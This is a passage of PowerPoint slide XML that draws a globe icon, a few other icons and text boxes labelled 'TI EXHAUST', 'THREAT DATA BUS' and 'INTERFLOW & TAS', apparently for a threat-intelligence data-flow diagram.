                  <a:gd name="T83" fmla="*/ 10 h 128"/>
                  <a:gd name="T84" fmla="*/ 13 w 128"/>
                  <a:gd name="T85" fmla="*/ 88 h 128"/>
                  <a:gd name="T86" fmla="*/ 39 w 128"/>
                  <a:gd name="T87" fmla="*/ 88 h 128"/>
                  <a:gd name="T88" fmla="*/ 49 w 128"/>
                  <a:gd name="T89" fmla="*/ 118 h 128"/>
                  <a:gd name="T90" fmla="*/ 13 w 128"/>
                  <a:gd name="T91" fmla="*/ 88 h 128"/>
                  <a:gd name="T92" fmla="*/ 79 w 128"/>
                  <a:gd name="T93" fmla="*/ 118 h 128"/>
                  <a:gd name="T94" fmla="*/ 89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moveTo>
                      <a:pt x="115" y="40"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="40"/>
                      <a:pt x="89" y="40"/>
                      <a:pt x="89" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="28"/>
                      <a:pt x="84" y="17"/>
                      <a:pt x="79" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="14"/>
                      <a:pt x="108" y="26"/>
                      <a:pt x="115" y="40"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="120" y="64"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="70"/>
                      <a:pt x="119" y="75"/>
                      <a:pt x="118" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="80"/>
                      <a:pt x="90" y="80"/>
                      <a:pt x="90" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="75"/>
                      <a:pt x="91" y="69"/>
                      <a:pt x="91" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="59"/>
                      <a:pt x="91" y="53"/>
                      <a:pt x="90" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="48"/>
                      <a:pt x="118" y="48"/>
                      <a:pt x="118" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="53"/>
                      <a:pt x="120" y="58"/>
                      <a:pt x="120" y="64"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="64" y="120"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="120"/>
                      <a:pt x="50" y="107"/>
                      <a:pt x="47" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="88"/>
                      <a:pt x="81" y="88"/>
                      <a:pt x="81" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="107"/>
                      <a:pt x="71" y="120"/>
                      <a:pt x="64" y="120"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="46" y="80"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="75"/>
                      <a:pt x="45" y="70"/>
                      <a:pt x="45" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="58"/>
                      <a:pt x="45" y="53"/>
                      <a:pt x="46" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="48"/>
                      <a:pt x="82" y="48"/>
                      <a:pt x="82" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="53"/>
                      <a:pt x="83" y="58"/>
                      <a:pt x="83" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="70"/>
                      <a:pt x="83" y="75"/>
                      <a:pt x="82" y="80"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="46" y="80"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="8" y="64"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="58"/>
                      <a:pt x="9" y="53"/>
                      <a:pt x="10" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="48"/>
                      <a:pt x="38" y="48"/>
                      <a:pt x="38" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="53"/>
                      <a:pt x="37" y="59"/>
                      <a:pt x="37" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="69"/>
                      <a:pt x="37" y="75"/>
                      <a:pt x="38" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="80"/>
                      <a:pt x="10" y="80"/>
                      <a:pt x="10" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="75"/>
                      <a:pt x="8" y="70"/>
                      <a:pt x="8" y="64"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="64" y="8"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="8"/>
                      <a:pt x="78" y="21"/>
                      <a:pt x="81" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="40"/>
                      <a:pt x="47" y="40"/>
                      <a:pt x="47" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="21"/>
                      <a:pt x="57" y="8"/>
                      <a:pt x="64" y="8"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="49" y="10"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="17"/>
                      <a:pt x="41" y="28"/>
                      <a:pt x="39" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="40"/>
                      <a:pt x="13" y="40"/>
                      <a:pt x="13" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="26"/>
                      <a:pt x="33" y="14"/>
                      <a:pt x="49" y="10"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="13" y="88"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="88"/>
                      <a:pt x="39" y="88"/>
                      <a:pt x="39" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="100"/>
                      <a:pt x="44" y="111"/>
                      <a:pt x="49" y="118"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="114"/>
                      <a:pt x="20" y="102"/>
                      <a:pt x="13" y="88"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="79" y="118"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="111"/>
                      <a:pt x="87" y="100"/>
                      <a:pt x="89" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="88"/>
                      <a:pt x="115" y="88"/>
                      <a:pt x="115" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="102"/>
                      <a:pt x="95" y="114"/>
                      <a:pt x="79" y="11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1" name="Group 80"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="9537205" y="1591510"/>
                <a:ext cx="251050" cy="250860"/>
                <a:chOff x="9541968" y="1591510"/>
                <a:chExt cx="251050" cy="250860"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="80" name="Oval 79"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9589761" y="1591510"/>
                  <a:ext cx="203257" cy="203257"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="0059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1" name="Group 70"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="9541968" y="1629592"/>
                  <a:ext cx="212778" cy="212778"/>
                  <a:chOff x="5426075" y="663575"/>
                  <a:chExt cx="436563" cy="436563"/>
                </a:xfrm>
                <a:noFill/>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="72" name="Oval 75"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="5599113" y="663575"/>
                    <a:ext cx="263525" cy="263525"/>
                  </a:xfrm>
                  <a:prstGeom prst="ellipse">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:grpFill/>
                  <a:ln w="285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Line 76"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeShapeType="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm flipH="1">
                    <a:off x="5426075" y="887413"/>
                    <a:ext cx="212725" cy="212725"/>
                  </a:xfrm>
                  <a:prstGeom prst="line">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:grpFill/>
                  <a:ln w="285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70" name="Freeform 71"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="9336455" y="1473455"/>
                <a:ext cx="218275" cy="243141"/>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7" name="Group 86"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="11239135" y="1495345"/>
              <a:ext cx="580462" cy="333096"/>
              <a:chOff x="7658100" y="4062413"/>
              <a:chExt cx="1031875" cy="592138"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="88" name="Oval 58"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7729538" y="4062413"/>
                <a:ext cx="339725" cy="346075"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:pr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59"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7658100" y="4408488"/>
                <a:ext cx="476250" cy="246063"/>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60"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="8045450" y="4144963"/>
                <a:ext cx="476250" cy="354013"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 25 w 300"/>
                  <a:gd name="T1" fmla="*/ 223 h 223"/>
                  <a:gd name="T2" fmla="*/ 300 w 300"/>
                  <a:gd name="T3" fmla="*/ 223 h 223"/>
                  <a:gd name="T4" fmla="*/ 300 w 300"/>
                  <a:gd name="T5" fmla="*/ 0 h 223"/>
                  <a:gd name="T6" fmla="*/ 0 w 300"/>
                  <a:gd name="T7" fmla="*/ 0 h 223"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="300" h="223">
                    <a:moveTo>
                      <a:pt x="25" y="223"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="300" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:ln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Line 61"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="8262938" y="4498975"/>
                <a:ext cx="0" cy="122238"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="317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62"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="8464550" y="4211638"/>
                <a:ext cx="225425" cy="409575"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 36 w 142"/>
                  <a:gd name="T1" fmla="*/ 0 h 258"/>
                  <a:gd name="T2" fmla="*/ 142 w 142"/>
                  <a:gd name="T3" fmla="*/ 0 h 258"/>
                  <a:gd name="T4" fmla="*/ 142 w 142"/>
                  <a:gd name="T5" fmla="*/ 258 h 258"/>
                  <a:gd name="T6" fmla="*/ 0 w 142"/>
                  <a:gd name="T7" fmla="*/ 258 h 258"/>
                  <a:gd name="T8" fmla="*/ 0 w 142"/>
                  <a:gd name="T9" fmla="*/ 181 h 258"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="142" h="258">
                    <a:moveTo>
                      <a:pt x="36" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="142" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="181"/>
                    </a:ln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Line 63"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="8108950" y="4621213"/>
                <a:ext cx="258763" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="317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Line 64"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="8521700" y="4341813"/>
                <a:ext cx="168275" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="317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Line 65"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="8521700" y="4449763"/>
                <a:ext cx="168275" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="317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Line 66"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="8166100" y="4251325"/>
                <a:ext cx="73025" cy="139700"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="317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67"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="8310563" y="4235450"/>
                <a:ext cx="73025" cy="155575"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 46"/>
                  <a:gd name="T1" fmla="*/ 0 h 98"/>
                  <a:gd name="T2" fmla="*/ 46 w 46"/>
                  <a:gd name="T3" fmla="*/ 52 h 98"/>
                  <a:gd name="T4" fmla="*/ 0 w 46"/>
                  <a:gd name="T5" fmla="*/ 98 h 98"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="46" h="98">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="46" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="98"/>
                    </a:ln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7" name="TextBox 106"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4878265" y="2549133"/>
              <a:ext cx="1137170" cy="663258"/>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INTERFLOW </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&amp; TAS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="108" name="TextBox 107"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2414583" y="2484174"/>
              <a:ext cx="1101905" cy="440890"/>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TI EXHAUST</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="109" name="TextBox 108"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2205676" y="2831099"/>
              <a:ext cx="1531510" cy="440890"/>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THREAT DATA BUS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="121" name="Group 120"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3835962" y="2501288"/>
              <a:ext cx="509588" cy="743997"/>
              <a:chOff x="9158770" y="3327619"/>
              <a:chExt cx="509588" cy="743997"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="98" name="Group 97"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="9158770" y="3526950"/>
                <a:ext cx="509588" cy="345281"/>
                <a:chOff x="-754063" y="3411538"/>
                <a:chExt cx="509588" cy="345281"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="99" name="Group 98"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm rot="10800000">
                  <a:off x="-754063" y="3411538"/>
                  <a:ext cx="455613" cy="342900"/>
                  <a:chOff x="-754063" y="3043238"/>
                  <a:chExt cx="455613" cy="342900"/>
                </a:xfrm>
                <a:grpFill/>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="104" name="Freeform 42"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="-754063" y="3043238"/>
                    <a:ext cx="455613" cy="287338"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 101 w 126"/>
                      <a:gd name="T1" fmla="*/ 6 h 79"/>
                      <a:gd name="T2" fmla="*/ 111 w 126"/>
                      <a:gd name="T3" fmla="*/ 15 h 79"/>
                      <a:gd name="T4" fmla="*/ 53 w 126"/>
                      <a:gd name="T5" fmla="*/ 44 h 79"/>
                      <a:gd name="T6" fmla="*/ 0 w 126"/>
                      <a:gd name="T7" fmla="*/ 71 h 79"/>
                      <a:gd name="T8" fmla="*/ 0 w 126"/>
                      <a:gd name="T9" fmla="*/ 79 h 79"/>
                      <a:gd name="T10" fmla="*/ 59 w 126"/>
                      <a:gd name="T11" fmla="*/ 50 h 79"/>
                      <a:gd name="T12" fmla="*/ 110 w 126"/>
                      <a:gd name="T13" fmla="*/ 23 h 79"/>
                      <a:gd name="T14" fmla="*/ 101 w 126"/>
                      <a:gd name="T15" fmla="*/ 32 h 79"/>
                      <a:gd name="T16" fmla="*/ 107 w 126"/>
                      <a:gd name="T17" fmla="*/ 38 h 79"/>
                      <a:gd name="T18" fmla="*/ 126 w 126"/>
                      <a:gd name="T19" fmla="*/ 19 h 79"/>
                      <a:gd name="T20" fmla="*/ 107 w 126"/>
                      <a:gd name="T21" fmla="*/ 0 h 79"/>
                      <a:gd name="T22" fmla="*/ 101 w 126"/>
                      <a:gd name="T23"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79">
                        <a:moveTo>
                          <a:pt x="101" y="6"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="111" y="15"/>
                          <a:pt x="111" y="15"/>
                          <a:pt x="111" y="15"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="89" y="16"/>
                          <a:pt x="68" y="26"/>
                          <a:pt x="53" y="44"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="39" y="62"/>
                          <a:pt x="20" y="71"/>
                          <a:pt x="0" y="71"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="79"/>
                          <a:pt x="0" y="79"/>
                          <a:pt x="0" y="79"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="23" y="79"/>
                          <a:pt x="44" y="69"/>
                          <a:pt x="59" y="50"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="73" y="33"/>
                          <a:pt x="91" y="24"/>
                          <a:pt x="110" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="101" y="32"/>
                          <a:pt x="101" y="32"/>
                          <a:pt x="101" y="32"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="107" y="38"/>
                          <a:pt x="107" y="38"/>
                          <a:pt x="107" y="38"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="126" y="19"/>
                          <a:pt x="126" y="19"/>
                          <a:pt x="126" y="19"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="107" y="0"/>
                          <a:pt x="107" y="0"/>
                          <a:pt x="107" y="0"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="101"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43"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="-754063" y="3098801"/>
                    <a:ext cx="184150" cy="93663"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 47 w 51"/>
                      <a:gd name="T1" fmla="*/ 24 h 26"/>
                      <a:gd name="T2" fmla="*/ 51 w 51"/>
                      <a:gd name="T3" fmla="*/ 20 h 26"/>
                      <a:gd name="T4" fmla="*/ 0 w 51"/>
                      <a:gd name="T5" fmla="*/ 0 h 26"/>
                      <a:gd name="T6" fmla="*/ 0 w 51"/>
                      <a:gd name="T7" fmla="*/ 8 h 26"/>
                      <a:gd name="T8" fmla="*/ 45 w 51"/>
                      <a:gd name="T9" fmla="*/ 26 h 26"/>
                      <a:gd name="T10" fmla="*/ 47 w 51"/>
                      <a:gd name="T11" fmla="*/ 24 h 26"/>
                    </a:gdLst>
                    <a:ahLst/>
                    <a:cxnLst>
                      <a:cxn ang="0">
                        <a:pos x="T0" y="T1"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="T2" y="T3"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="T4" y="T5"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="T6" y="T7"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="T8" y="T9"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="T10" y="T11"/>
                      </a:cxn>
                    </a:cxnLst>
                    <a:rect l="0" t="0" r="r" b="b"/>
                    <a:pathLst>
                      <a:path w="51" h="26">
                        <a:moveTo>
                          <a:pt x="47" y="24"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="48" y="23"/>
                          <a:pt x="49" y="22"/>
                          <a:pt x="51" y="20"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="36" y="7"/>
                          <a:pt x="19" y="0"/>
                          <a:pt x="0" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="8"/>
                          <a:pt x="0" y="8"/>
                          <a:pt x="0" y="8"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="8"/>
                          <a:pt x="32" y="14"/>
                          <a:pt x="45" y="26"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="46" y="26"/>
                          <a:pt x="46" y="25"/>
                          <a:pt x="47"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44"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="-530225" y="3236913"/>
                    <a:ext cx="231775" cy="149225"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 39 w 64"/>
                      <a:gd name="T1" fmla="*/ 9 h 41"/>
                      <a:gd name="T2" fmla="*/ 48 w 64"/>
                      <a:gd name="T3" fmla="*/ 18 h 41"/>
                      <a:gd name="T4" fmla="*/ 5 w 64"/>
                      <a:gd name="T5" fmla="*/ 0 h 41"/>
                      <a:gd name="T6" fmla="*/ 3 w 64"/>
                      <a:gd name="T7" fmla="*/ 2 h 41"/>
                      <a:gd name="T8" fmla="*/ 0 w 64"/>
                      <a:gd name="T9" fmla="*/ 6 h 41"/>
                      <a:gd name="T10" fmla="*/ 49 w 64"/>
                      <a:gd name="T11" fmla="*/ 26 h 41"/>
                      <a:gd name="T12" fmla="*/ 39 w 64"/>
                      <a:gd name="T13" fmla="*/ 35 h 41"/>
                      <a:gd name="T14" fmla="*/ 45 w 64"/>
                      <a:gd name="T15" fmla="*/ 41 h 41"/>
                      <a:gd name="T16" fmla="*/ 64 w 64"/>
                      <a:gd name="T17" fmla="*/ 22 h 41"/>
                      <a:gd name="T18" fmla="*/ 45 w 64"/>
                      <a:gd name="T19" fmla="*/ 3 h 41"/>
                      <a:gd name="T20" fmla="*/ 39 w 64"/>
                      <a:gd name="T21"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41">
                        <a:moveTo>
                          <a:pt x="39" y="9"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="48" y="18"/>
                          <a:pt x="48" y="18"/>
                          <a:pt x="48" y="18"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="33" y="17"/>
                          <a:pt x="18" y="11"/>
                          <a:pt x="5" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5" y="0"/>
                          <a:pt x="4" y="1"/>
                          <a:pt x="3" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="3"/>
                          <a:pt x="1" y="4"/>
                          <a:pt x="0" y="6"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="18"/>
                          <a:pt x="31" y="26"/>
                          <a:pt x="49" y="26"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="39" y="35"/>
                          <a:pt x="39" y="35"/>
                          <a:pt x="39" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="45" y="41"/>
                          <a:pt x="45" y="41"/>
                          <a:pt x="45" y="41"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="64" y="22"/>
                          <a:pt x="64" y="22"/>
                          <a:pt x="64" y="22"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="45" y="3"/>
                          <a:pt x="45" y="3"/>
                          <a:pt x="45" y="3"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="39"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00" name="Group 99"/>
                <p:cNvGrpSpPr/>
